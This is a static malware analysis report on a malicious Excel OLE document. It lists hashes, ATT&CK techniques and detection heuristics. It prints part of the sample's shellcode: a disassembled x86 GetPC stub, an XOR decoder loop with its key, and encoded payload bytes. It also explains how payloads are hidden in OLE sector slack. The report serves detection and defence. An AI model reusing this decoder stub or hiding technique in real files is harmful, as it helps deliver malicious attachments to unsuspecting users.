Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db9b961ead5f7579…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 176.0 KB
Created: 1996-12-17 01:32:42
Authoring application: Microsoft Excel
First seen: 2015-09-15
MD5: 02a2ef5e70f0e167c57269393bd02c90
SHA-1: f0ad527f153db45ed2dd219c79f919266a10c283
SHA-256: db9b961ead5f75795b77fda2ad40f8f4fdb2ee153c4acdd7e8392affbc485188
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment

The file is an OLE document with a large appended payload region of high entropy, indicating that it likely contains an embedded executable. The OLE slack anomaly and appended payload heuristics confirm this structure. The presence of an exploit stub (an x86 GetPC sequence followed by an XOR decoder loop) suggests it is designed to execute arbitrary code, most likely delivered as a spearphishing attachment.

Heuristics (3)

  • x86 GetPC stub (CALL $+5; POP EDI) (severity: high, ID: SC_GETPC_CALL)
    Disassembly (attempted x86 opcode disassembly). The CALL/POP pair at 0xD11 recovers the current address, and the loop at 0xD22 XORs 0x2AD bytes starting at 0xD37 with key 0x97 before jumping to them; the bytes from 0xD37 onward are therefore the still-encoded payload and do not disassemble meaningfully.
    00000D11  e800000000        call 0xd16
    00000D16  5f                pop edi
    00000D17  83c729            add edi, 0x29
    00000D1A  66bbc65f          mov bx, 0x5fc6
    00000D1E  57                push edi
    00000D1F  5e                pop esi
    00000D20  eb10              jmp 0xd32
    00000D22  5a                pop edx
    00000D23  4a                dec edx
    00000D24  33c9              xor ecx, ecx
    00000D26  66b9ad02          mov cx, 0x2ad
    00000D2A  80340a97          xor byte ptr [edx + ecx], 0x97
    00000D2E  e2fa              loop 0xd2a
    00000D30  eb05              jmp 0xd37
    00000D32  e8ebffffff        call 0xd22
    00000D37  a4                movsb byte ptr es:[edi], byte ptr [esi]
    00000D38  57                push edi
    00000D39  f31cd7            sbb al, 0xd7
    00000D3C  a7                cmpsd dword ptr [esi], dword ptr es:[edi]
    00000D3D  a91cd79ba9        test eax, 0xa99bd71c
    00000D42  1cd7              sbb al, 0xd7
    00000D44  8ba91ce79fa9      mov ebp, dword ptr [ecx - 0x566018e4]
    00000D4A  1cef              sbb al, 0xef
    00000D4C  b7a9              mov bh, 0xa9
    00000D4E  1c97              sbb al, 0x97
    00000D50  f1                int1
    00000D51  a914e88f97        test eax, 0x978fe814
    00000D56  e27a              loop 0xdd2
    00000D58  16                push ss
    00000D59  7b97              jnp 0xcf2
    00000D5B  93                xchg ebx, eax
    00000D5C  97                xchg edi, eax
    00000D5D  97                xchg edi, eax
    00000D5E  1c6b              sbb al, 0x6b
    00000D60  a950901248        test eax, 0x48129050
    00000D65  382ca9            cmp byte ptr [ecx + ebp*4], ch
    00000D68  50                push eax
    00000D69  d09319849d3b      rcl byte ptr [ebx + 0x3b9d8419]
    00000D6F  a9                .byte 0xa9
    00000D70  50                push eax
  • OLE document has large unaccounted-for region (severity: high, ID: OLE_SLACK_ANOMALY)
    OLE file is 180,245 bytes but its declared streams total only 20,469 bytes — 159,776 bytes (89%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes (severity: high, ID: OLE_APPENDED_PAYLOAD)
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.